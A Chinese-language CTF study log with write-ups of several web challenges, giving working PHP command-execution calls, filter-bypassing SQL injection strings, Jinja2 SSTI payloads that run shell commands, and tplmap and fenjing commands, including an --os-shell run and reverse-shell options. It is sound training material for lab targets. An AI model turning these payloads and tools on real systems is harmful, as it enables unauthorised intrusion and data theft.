刷题学习记录

[LitCTF 2023]PHP是世界上最好的语言!!

知识点:rce+PHP

进入环境是一个转化框和运行框

刷题学习记录_第1张图片

 既然是rce还有运行框就只用输入命令等待回显就行

参考:RCE(命令执行)总结-CSDN博客

 paylaod:

system(‘ls’);
system(‘pwd’);
system(‘find / -name flag*’);
system(‘cat /flag’);

刷题学习记录_第2张图片

刷题学习记录_第3张图片

刷题学习记录_第4张图片

得到flag

刷题学习记录_第5张图片

笔记

RCE总结:RCE总结-CSDN博客

rce

常用代码执行函数

eval()、assert()、preg_replace()、create_function()、array_map()、call_user_func()、call_user_func_array()、array_filter()、uasort()

常用命令执行函数

system()、exec()、shell_exec()、pcntl_exec()、popen()、proc_popen()、passthru()

参考:RCE-命令执行总结_rce命令执行-CSDN博客

 [SWPUCTF 2022 新生赛]numgame

知识点:PHP+代码审计+查看源代码方式+数组引索

进入环境,有一个等式但是一直到不了20

刷题学习记录_第6张图片

 用F12和Ctrl+U也不能查看到源代码,没有反应

那么就用view-source:http://node5.anna.nssctf.cn:28805/

刷题学习记录_第7张图片

发现

./js/1.js

点击访问,得到刷题学习记录_第8张图片

 解码花括号里的内容得到

刷题学习记录_第9张图片

 接着访问改文件名NsScTf.php,得到真正的源码

刷题学习记录_第10张图片

 接着尝试访问hint2.php

刷题学习记录_第11张图片

代码审计:

  1. 通过 include("flag.php") 引入了一个名为 “flag.php” 的文件。这个文件很有可能包含了标志信息。
  2. 通过 class nss 定义了一个名为 “nss” 的类,其中具有一个静态方法 “ctf”,这个方法通过 include("./hint2.php") 引入了另一个名为 “hint2.php” 的文件。这个类的作用目前不明确,但可以猜测 “ctf” 方法可能会与 “hint2.php” 文件相关。
  3. 通过 isset($_GET['p']) 判断是否接收到了名为 “p” 的 GET 参数。如果存在 “p” 参数,则会根据参数值调用相应的函数。
  4. 在调用函数之前,通过 preg_match() 函数检查参数值中是否包含字符 “n” 或 “c”。如果包含了这些字符,则会输出 “no” 并停止程序执行。
  5. 最后,如果未接收到 “p” 参数,则会输出当前文件的源代码。
  6. 源码提示:与get相似的另一种请求协议是什么呢,既然用跟get相似的协议所以这里就运用post。

 补充:

数组引索

数组索引是用于标识和访问数组元素的唯一标识符。它们通常是整数值,用于标识元素在数组中的位置。

在大多数编程语言中,数组的索引从 0 开始,依次递增。例如,对于一个长度为 n 的数组,索引范围通常是从 0 到 n-1,共有 n 个元素可以访问。

下面是一个示例数组及其索引示意图:

数组:[12, 34, 56, 78, 90]
索引: 0 1 2 3 4

在示例中,数组包含五个元素,使用索引可以访问和操作这些元素。例如,要访问数组中的第二个元素(34),我们使用索引 1(因为索引是从 0 开始计数)。同样,要访问数组中的第四个元素(78),我们使用索引 3。

 payload:

p[0]=nss&p[1]=ctf

刷题学习记录_第12张图片

 改成nss2

payload:

p[0]=nss2&p[1]=ctf

刷题学习记录_第13张图片

 但是没有出现flag,最后看了源码,flag是藏在源码中

刷题学习记录_第14张图片

[SWPUCTF 2022 新生赛]ez_sql

知识点:sql注入

进入环境,提示用post传参

刷题学习记录_第15张图片

尝试一下get,不能用那么就用post

刷题学习记录_第16张图片

 简单传一个1,没想到是flag,但是是假的

刷题学习记录_第17张图片

 开始进行sql注入,查库查表查字段爆数据

但是

发现or和空格都无回显,union也没有

空格可以用/**/来代替,union可以双写绕过

 开始注入

nss=2'/**/ununionion/**/select/**/1,2,3;#

刷题学习记录_第18张图片

 查库:

nss=2'/**/ununionion/**/select/**/1,database(),3;#

刷题学习记录_第19张图片

查表:

nss=2'/**/ununionion/**/select/**/1,database(),group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema='NSS_db';#

刷题学习记录_第20张图片

查字段:

nss=2'/**/ununionion/**/select/**/1,database(),group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_name='NSS_tb';#

刷题学习记录_第21张图片

 查数据:

nss=2'/**/ununionion/**/select/**/1,group_concat(Secr3t),group_concat(flll444g)/**/from/**/NSS_tb;#  

刷题学习记录_第22张图片

得到flag

NSSCTF{636b87ae-6445-4824-8598-7c264e9a6728}

[HNCTF 2022 WEEK2]ez_SSTI

知识点:SSTI

进入环境

刷题学习记录_第23张图片

检测ssti注入,很多ssti的参数都是name

?name={{7*7}}

 刷题学习记录_第24张图片

 没有过滤

找flag

payload:

?name={{config.__class__.__init__.__globals__['os'].popen('ls').read()}}

刷题学习记录_第25张图片

拿flag

?name={{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}

刷题学习记录_第26张图片

 但是这题用fenjing却跑不出来

刷题学习记录_第27张图片

虽然fenjing不能用,但是tplmap可以用,要先安装好tplmap

直接连接注入,成功后查看文件,再打开flag

python2 ./tplmap.py -u 'http://node5.anna.nssctf.cn:28389/?name=/' --os-shell

 刷题学习记录_第28张图片

得到flag

NSSCTF{61f84712-a0c6-4335-b9a2-476bc0e629d6}

笔记

tplmap的安装

kali 下安装tplmap

1. 安装kali下的python2的pip工具

kali2020版及以上, 输入python2命令会执行python2, python3也存在。

但pip默认是pip3, 而我们需要的是pip2, 所以我们需要先安装pip2

# 进入家目录
cd 

#建立目录ins-pip2
mkdir ins-pip2

#下载pip2安装脚本
wget  https://bootstrap.pypa.io/pip/2.6/get-pip.py

#python2执行 需要sudo权限
sudo python2 get-pip.py

#升级pip2
sudo pip2 install --upgrade pip 

#安装pip2扩展工具,不然后面安装还是报错
sudo pip2 install --upgrade setuptools 

## 2 tplmap的安装和使用

tpl是用python2编写的,报错一般是使用py3

以下操作均在kali 2020的环境下操作

2.1 使用git克隆tplmap

git clone https://github.com/epinna/tplmap

cd tplmap

sudo pip2 install -r requirements.txt

2.2 操作实例

#探测注入点
python2 tplmap.py -u 'http://114.67.246.176:17787/?flag'


#获取shell
python2 tplmap.py -u 'http://114.67.246.176:17787/?flag' --os-shell

2.3 详细命令


--os-shell                          Run shell on the target
--os-cmd                            Execute shell commands
--bind-shell PORT                   Connect to a shell bind to a target port
--reverse-shell HOST PORT   Send a shell back to the attacker's port
--upload LOCAL REMOTE       Upload files to the server
--download REMOTE LOCAL     Download remote files

 使用

python2 ./tplmap.py -u 'http://node5.anna.nssctf.cn:28389/?name=/' --os-shell
//name是参数,具体题目中指定的传入参数
//--os-shell 是命令,具体看各个命令的用法

常见问题

在安装好工具使用的时候,常常会出现

[!][tplmap] Exiting: 'bool' object has no attribute 'replace'

刷题学习记录_第29张图片

解决办法:删除tplmap/core/checks.py文件中Twig条目,保存退出。

Twig就在此列表中:
plugins = [
    Smarty,
    Mako,
    Python,
    Tornado,
    Jinja2,
    Freemarker,
    Velocity,
    Slim,
    Erb,
    Pug,
    Nunjucks,
    Dot,
    Dust,
    Marko,
    Javascript,
    Php,
    Ruby,
    Ejs
]
刷题学习记录_第30张图片

 注意打开更改文件内容的时候要以root的身份打开,不然权限不够不可以成功更改,将Twig删除后就可以成功运行tplmqp

如果出现

[!][checks] Tested parameters appear to be not injectable.

[!][checks] Tested parameters appear to be not injectable.

就使用其他命令注入,但是参数后面的"="一定不能少,少了"="依旧会报错。

[GDOUCTF 2023]

知识点:SSTI

进入环境

刷题学习记录_第31张图片

 先用tplmap跑一遍,但是不知道参数是什么,先用name跑

python2 ./tplmap.py -u 'http://node5.anna.nssctf.cn:28944/?name=' --os-shell

结果该参数无法注入

刷题学习记录_第32张图片

 尝试用fenjing跑一遍

python -m fenjing scan --url http://node5.anna.nssctf.cn:28944/

这次跑成功了

刷题学习记录_第33张图片

 ls /

查看文件

刷题学习记录_第34张图片

 cat /flag

查看flag

刷题学习记录_第35张图片

 得到flag

NSSCTF{159a9656-a3f2-4ed2-97e3-276a8d4ead88}

fenjing与tplmap的区别

焚靖(fenjing)是一个针对CTF比赛中Jinja SSTI绕过WAF的全自动脚本,可以自动攻击给定的网站或接口。 

tplmap 工具支持检测和利用多种模板引擎的注入漏洞,包括但不限于以下常见模板引擎:

  1. Jinja2:Jinja2 是一个流行的Python模板引擎,常用于构建Web应用程序。tplmap 可以检测和利用 Jinja2 模板注入漏洞。

  2. Django:Django 是一个使用 Python 编写的高级 Web 框架,tplmap 可以检测和利用 Django 模板注入漏洞。

  3. Mako:Mako 是一个用于 Python 的模板引擎,常用于构建动态内容。tplmap 可以检测和利用 Mako 模板注入漏洞。

  4. Tornado:Tornado 是一个可扩展的 Python Web 框架,tplmap 可以检测和利用 Tornado 模板注入漏洞。

  5. Freemarker:Freemarker 是一个使用 Java 编写的模板引擎,tplmap 可以检测和利用 Freemarker 模板注入漏洞。

  6. Velocity:Velocity 是一个用于 Java 的模板引擎框架,tplmap 可以检测和利用 Velocity 模板注入漏洞。

  7. Smarty:Smarty 是一个用于 PHP 的模板引擎,tplmap 可以检测和利用 Smarty 模板注入漏洞。

  8. AngularJS:AngularJS 是一个流行的 JavaScript 框架,tplmap 可以通过利用 AngularJS 的模板注入漏洞来执行任意代码。

  9. Handlebars:Handlebars 是一个 JavaScript 的语义化模板引擎,tplmap 可以检测和利用 Handlebars 模板注入漏洞。

  10. ERB:ERB(Embedded RuBy)是一个用于 Ruby 的嵌入式模板引擎,tplmap 可以检测和利用 ERB 模板注入漏洞。

  11. ASP.NET Razor:ASP.NET Razor 是一个用于 ASP.NET 的页面模板引擎,tplmap 可以检测和利用 ASP.NET Razor 模板注入漏洞。

 

你可能感兴趣的:(学习)